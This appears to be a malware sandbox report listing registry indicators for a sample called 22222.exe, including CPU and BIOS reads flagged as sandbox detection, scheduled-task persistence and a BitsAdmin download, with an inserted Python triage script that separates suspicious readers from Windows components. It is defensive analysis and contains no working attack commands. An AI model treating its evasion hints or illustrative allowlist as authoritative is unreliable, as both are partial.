Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe
Key value queried
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe
Key opened
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
22222.exe, WerFault.exe (×10)
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | 22222.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | 22222.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | 22222.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | 22222.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | 22222.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | 22222.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe, schtasks.exe
pid | process
6768 | schtasks.exe
5188 | schtasks.exe
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 25 IoCs
Processes:
WerFault.exe (×10), 22222.exe, msedge.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | 22222.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | 22222.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
-
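The "Checks processor information in registry" and "Enumerates system info in registry" signatures above match any process that touches those keys, which is why most of their 64 and 25 hits come from WerFault.exe and msedge.exe rather than from the dropped binaries. The Python script below is an added example, not part of the sandbox report or its tooling: it parses rows in the report's `description ioc process` layout, groups them by fingerprint category (CPU, BIOS, SCSI device enumeration) and separates hits from the dropped executable from the Windows components that read the same keys during normal operation. The sample rows, the category patterns and the expected-reader allowlist are all constructed for this example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample rows in the report's "description ioc process" layout.
# Typed in as test input, modelled on the kinds of rows the sandbox lists.
SAMPLE_ROWS = r"""
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 22222.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 22222.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 22222.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe
"""

# <action> <ioc path> <process>; the process column is the last whitespace-free
# token ending in .exe, so the ioc may itself contain spaces ("Platform Specific Field 1").
ROW_RE = re.compile(
    r"^(?P<action>Key opened|Key value queried|Key created|Set value \(data\)) "
    r"(?P<ioc>\\REGISTRY\\.*?) "
    r"(?P<process>\S+\.exe)$"
)

# Registry locations commonly used as VM/sandbox fingerprints: CPU name and clock
# speed, BIOS/system identity strings, and the SCSI enumeration that exposes the
# virtual disk vendor/product strings. Matched case-insensitively because the
# report spells the same hive both HARDWARE\DESCRIPTION and Hardware\Description.
FINGERPRINT_KEYS = {
    "cpu": re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\", re.I),
    "bios": re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\BIOS", re.I),
    "scsi_enum": re.compile(r"\\SYSTEM\\ControlSet\d+\\Enum\\SCSI\\", re.I),
}

# Analyst tuning (an assumption for this example, not from the report): Windows
# components that read these keys as part of normal operation, e.g. WerFault.exe
# collecting machine details for a crash report. Their hits are noise; hits from
# dropped binaries are the signal.
EXPECTED_READERS = {"werfault.exe", "msedge.exe", "svchost.exe", "vssvc.exe"}


def parse_rows(text):
    """Turn one report row per line into dicts with action/ioc/process fields."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised row: {line!r}")
        rows.append(m.groupdict())
    return rows


def classify(ioc):
    """Return the fingerprint category an IOC path falls into, or None."""
    for name, pattern in FINGERPRINT_KEYS.items():
        if pattern.search(ioc):
            return name
    return None


def summarize(text):
    """Per-process counts of fingerprint categories touched (non-fingerprint rows dropped)."""
    per_process = defaultdict(Counter)
    for row in parse_rows(text):
        category = classify(row["ioc"])
        if category is not None:
            per_process[row["process"]][category] += 1
    return {proc: dict(counts) for proc, counts in per_process.items()}


def suspicious_readers(text):
    """Processes that touch fingerprint keys and are not on the expected-reader list."""
    return sorted(
        proc for proc in summarize(text) if proc.lower() not in EXPECTED_READERS
    )


if __name__ == "__main__":
    for proc, counts in summarize(SAMPLE_ROWS).items():
        print(f"{proc:14} {counts}")
    print("review:", suspicious_readers(SAMPLE_ROWS))
```

Paste the rows of a report into `SAMPLE_ROWS` and the summary shows which process is actually fingerprinting the machine. On this report's data the CPU and BIOS reads by 22222.exe are the ones worth a second look, while the SCSI Enum rows are svchost.exe and vssvc.exe handling the "HeartDisk" volume, which is what the allowlist is for.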
Modifies data under HKEY_USERS 43 IoCs
Processes:
sihclient.exe, svchost.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
-
Modifies registry class 4 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ |
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
